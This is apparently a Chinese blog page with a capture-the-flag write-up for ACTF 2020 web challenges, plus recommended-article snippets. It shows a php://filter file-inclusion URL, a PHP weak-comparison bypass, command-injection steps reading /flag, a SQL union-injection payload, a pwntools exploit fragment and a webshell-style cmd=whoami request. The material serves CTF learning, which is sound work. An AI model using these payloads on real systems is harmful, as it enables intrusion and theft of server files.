ACTF题解

最新推荐文章于 2025-04-29 23:52:28 发布
最新推荐文章于 2025-04-29 23:52:28 发布
阅读量933 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41788704/article/details/109046353
版权
本文详细介绍了在ACTF比赛中通过查看HTML源码定位flag位置,利用伪协议进行文件包含,以及发现并利用index.php.bak源码泄露来解题的过程。还提到了弱类型比较在解题中的关键作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Include

查看HTML源码,发现flag位置
在这里插入图片描述因为题目提示,所以用伪协议包含文件

http://e4ca9c95-59dc-4e4f-8e08-99bbf23306dd.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

exec

在这里插入图片描述

backupfile

扫描发现index.php.bak源码泄露

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

弱类型比较
key=123

最低0.47元/天 解锁文章
ACTF writeup
王意林的专栏
05-07 8900
写在前面:     周末参加了浙大和安恒举办的ACTF,以下是一部分题目的解题思路。 crypto 100 密文: oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa
actf_2019_actfnote
doudoudedi
06-22 613
思路 通过溢出将topchunk的位置向上提然后申请堆块即可完成一次任意地址写入 exp: #!/usr/bin/python2 from pwn import * #p=process('./ACTF_2019_ACTFNOTE') p=remote('node3.buuoj.cn',26474) elf=ELF('./ACTF_2019_ACTFNOTE') libc=elf.libc def add(size,name,content): p.sendlineafter('$ ','1') p.
[ACTF新生赛2020]rome
qq_32304353的博客
03-30 137
可以得到flag是flag{Cae3ar_th4_Gre@t}需要将结果与V15的数值进行比较,相等才可以得到flag。F5查看反编译,这题主要函数在func。tar压缩包,里面包含题目。32位无壳exe程序。这里使用大佬的exp。
ACTF2020 新生赛
ScyLamb的博客
01-03 491
0x01 Include 源代码中发现文件包含 payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 得到 PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NThkODk3MTItYjVjNC00OWQwLWE1ZDgtOGZiYTk2YmZjNmI0fQo= 解base64: <?php echo "Can you find
ACTF新生赛
她叫常玉莹
08-01 329
includeExecUploadBackupFile include 点击tips 观察url存在文件包含,使用php://input伪协议但是题目中过滤了 尝试php://filter伪协议,payload进行编码得到php.flag base64编码后的源文件 read=convert.base64-encode读出来的文件base64加密 payload php://filter/read=convert.base64-encode/resource=flag.php 解码得flag E.
[ACTF 新生赛 2020]Exec
A1561163756的博客
01-29 343
今天写BUUCTF遇到的题目…菜的一批,每写一道题目偶读可以学到新东西 首先打开网页,先ping了一下127.0.0.1 网页执行了linux命令,又根据题目的提示,想到到这里可能包含了shell_exec()命令 于是输入 127.0.0.1;ls;试了一下 发现成功执行了,于是打算利用exec来找flag 输入;ls /;先看看根目录 发现里面有个flag,cat 一下试试看 输入 ;cat /flag;,得到flag ...
[ACTF新生赛2020]easyre1题解
qq_51952706的博客
11-20 619
如果v4和byte_402000对应字符一致则为正确,代码中还牵扯到了v5,上下都看了,也没找到v5的值,只有定义v5。就是v4数组的字符串在byte_402000的索引加一所得到的字符拼起来就是答案。拿到题目,有两个文件,第一个1kb,没什么内容,分析第二个,先查壳。找到main函数,f5反编译一下,分析代码。跳转到byte_402000发现字符串。v4数组的值上面已经说了。
BUUCTF__[ACTF2020 新生赛]Include_题解
风过江南乱的博客
06-26 2480
BUUCTF__[ACTF2020 新生赛]Include_题解
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2144
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUU 【ACTF2020 新生赛】Include 1 解题大致思路
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-14 1322
1.首先打开靶场环境 看到链接tips 打开tips 2.
ACTF2025 - WEB Excellent-Site
最新发布
hddi1的博客
04-29 1269
flask框架 #互联网 #利用CRLF进行头控制 #通过CRLF注入伪造 #利用sql注入进行回显控制 #Jinja2模板 #注意sql语句的相关转义可以控制查询结果[[IMAP协议简介]] [[SMTP协议简介]]
buuctf [ACTF新生赛2020]rome
shdbehdvd的博客
08-03 806
《倒头就睡T^T》
Asis CTF 2016 b00ks
Bill
04-01 2918
Asis CTF 2016 b00ks 1. 序言 &nbsp;&nbsp;本篇文章是对CTF WIKI Off-By-One漏洞类型的补充. CTF WIKI上面Off-By-One这一章节中两个例子均没有给出相应的EXP, 本次总结将其中一个例子详细分析一下, 希望能够对其他学习者有帮助 2. 程序简介 该程序是一个图书管理系统,可以添加书名,修改作者名以及写备注...
[ACTF2020 新生赛]Include1
weixin_64160292的博客
03-31 5716
题目:[ACTF2020 新生赛]Include1 题目来源:buuctf 过程分析: 1、首先看到一个tips,我们打开看看 然后从题目我们知道这个是一个文件包含题,对文件进行php伪协议检测 伪协议 php://input:用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。 条件: php <5.0 ,allow_url_include=Off 情况下也可以用 php > 5.0,只有在allow_url_fope
ACTF2020 新生赛 -- WP
会下雪的晴天
05-18 3253
做题思路记录,同时感谢赵师傅和Y1NG的环境与源码 文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Upload [ACTF2020 新生赛]Include 主页显示是一个链接,点进去看看,URL出现file=,结合题目判断为文件包含 用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx php:/.
[ACTF2020 新生赛]Include WriteUp(超级详细)
lunan的博客
04-22 2254
[ACTF2020 新生赛]Include   打开靶机发现一个超链接,点击之后出现一段话 “Can you find out the flag?” 查看源码注入,无果 仔细看url,发现有flag.php   根据题目提示,该题应该是文件包含漏洞,因此可以判断出此题是PHP伪协议题目,构造payload如下 ?file=php://filter/read=convert.base64-encode/resource=flag.php   此时可以得到base64的编吗后的
[ACTF2020 新生赛] Include
Sweet_vinegar520的博客
10-27 811
利用 php://filter 伪协议读取加密代码,显现注释隐藏代码,真的有点妙的。
BUUCTF [ACTF新生赛2020]outguess 1
YueXuan_521的博客
11-24 1240
BUUCTF [ACTF新生赛2020]outguess 1 用刚安装的outguess对mmm.jpg文件进行解密,导出隐写的内容。2、查看mmm.jpg图片属性,得到一段经过社会主义核心价值观编码加密的密文:“公正民主公正文明公正和谐”。使用在线网站进行解密,得到明文:“abc”,作为outguess解密的密钥。1、根据题目和flag.txt文件提示,猜测为outguess隐写。执行成功后,我们查看flag.txt文件,得到flag。得到的 flag 请包上 flag{} 提交。下载附件,得到一堆文件。
[ACTF2020 新生赛]BackupFile题解
2301_81574836的博客
04-26 324
[ACTF2020 新生赛]BackupFile题解
buuctf ACTF2020upload
12-31
### BUUCTF ACTF2020 Upload Challenge Writeup #### 文件上传漏洞分析 文件上传功能如果未经过严格的安全验证,可能会被攻击者利用来执行恶意操作。常见的安全风险包括但不限于:任意文件上传、脚本注入以及通过特定扩展名绕过检测机制等[^1]。 #### 解决方案概述 对于`ACTF2020 新生赛`中的`Upload`题目,在成功上传文件后返回路径 `./uplo4d/ddea6db74c0ab39b95ce495a41dfb1bf.phtml` 表明服务器端存在PHP处理逻辑,并且允许访问该位置下的`.phtml`文件[^2]。这暗示着可能存在远程代码执行的风险。 为了进一步探索此漏洞的可能性: - **确认环境配置** 攻击面在于能够控制的内容会被解释器解析并运行。因此首先要了解目标系统的具体设置,比如是否启用了危险函数如`exec()` 或其他可调用外部命令的功能[^3]。 - **测试命令注入** 如果上述条件成立,则可以通过构造特殊请求参数尝试触发系统指令执行。例如向URL附加额外的shell命令字符串以获取更多关于主机的信息或读取敏感数据文件。 ```bash http://target.com/upload.php?cmd=whoami&file=ddea6db74c0ab39b95ce495a41dfb1bf.phtml ``` 此处假设`upload.php`为负责接收POST提交表单并保存附件的服务接口;而`cmd`代表要传递给后台程序用于动态拼接SQL语句或其他业务流程的关键字。实际情况下应根据具体情况调整Payload结构。 最终目的是找到一种方法使服务端按照预期行为响应我们的自定义输入,从而实现信息泄露乃至完全控制系统的目的。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值